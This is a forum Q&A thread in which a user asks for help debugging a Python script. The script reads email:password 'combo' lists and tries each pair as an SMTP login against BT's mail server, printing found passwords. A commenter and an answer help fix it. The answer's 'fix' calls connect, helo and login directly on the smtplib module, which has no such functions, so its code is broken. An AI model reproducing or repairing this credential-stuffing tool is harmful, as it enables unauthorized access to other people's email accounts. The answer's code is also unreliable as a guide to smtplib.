# Why am I reviving AttributeError: 'int' object has no attribute 'find'?

Tags: python, smtp

```
import smtplib

smtpserver = s.connect("mail.btinternet.com", 465)
SMTP.helo("mail.btinternet.com")
SMTP.ehlo("mail.btinternet.com")

file = open("Combo.txt", "r") 

for line in file:
    x = line.split(":")
    user = x[0]
    password = x[1]

    s.login(user, password)
    print("[+] Password Found: %s" % password)

    if smtplib.SMTPAuthenticationError:
      print("Incorrect")
```

Here's my code. It checks a list of email/password combinations from a file to see if it is on a specific server (in my case BT).

But I am having trouble with the library names, I am not sure what to use. I checked on python docs but it wasn't clear enough, if someone can tell me as to what is incorrect I would deeply appreciate it.

Error received.
This will also give me errors for the other incorrect library names

```
Traceback (most recent call last):
    File "main.py", line 3, in <module>
    smtpserver = s.connect("mail.btinternet.com", 465)
NameError: name 's' is not defined
exited with non-zero status
```

Comment: What's the problem?

Comment: @SLaks I updated it.

Comment: But the error message tells you everything, doesn't it? s is not defined,  which is obviously true looking at your code.

Comment: @AndreasHeld I think I know that Sherlock, what I need to know is what the correct term is.

Comment: `s = smtplib.SMTP()`, docs: [smtplib](https://docs.python.org/3/library/smtplib.html)

Answer (score 0):

For your problem I think the reason why as to your libraries are not working properly is because you're calling your imported library inconsistently:

e.g. sometimes you type 's.xxxxx', sometimes you type 'SMTPlib.xxxxx' for your module attributes, you should import smtplib as 's'.

So what does this is it stores the library in a short form named 's', so whenever you call a module or use a function from the library, you don't have to type the full '.smtplib' but instead just type a '.s' extension behind the specific function:

```
import smtplib as s

smtpserver = s.connect("mail.btinternet.com", 465)
s.helo("mail.btinternet.com")
s.ehlo("mail.btinternet.com")

file = open("Combo.txt", "r") 

for line in file:
    x = line.split(":")
    user = x[0]
    password = x[1]

    s.login(user, password)
    print("[+] Password Found: %s" % password)

if s.SMTPAuthenticationError:
    print("Incorrect")
```

Should fix your problems now. remember to call functions from the specific library name in a consistent manner ('s').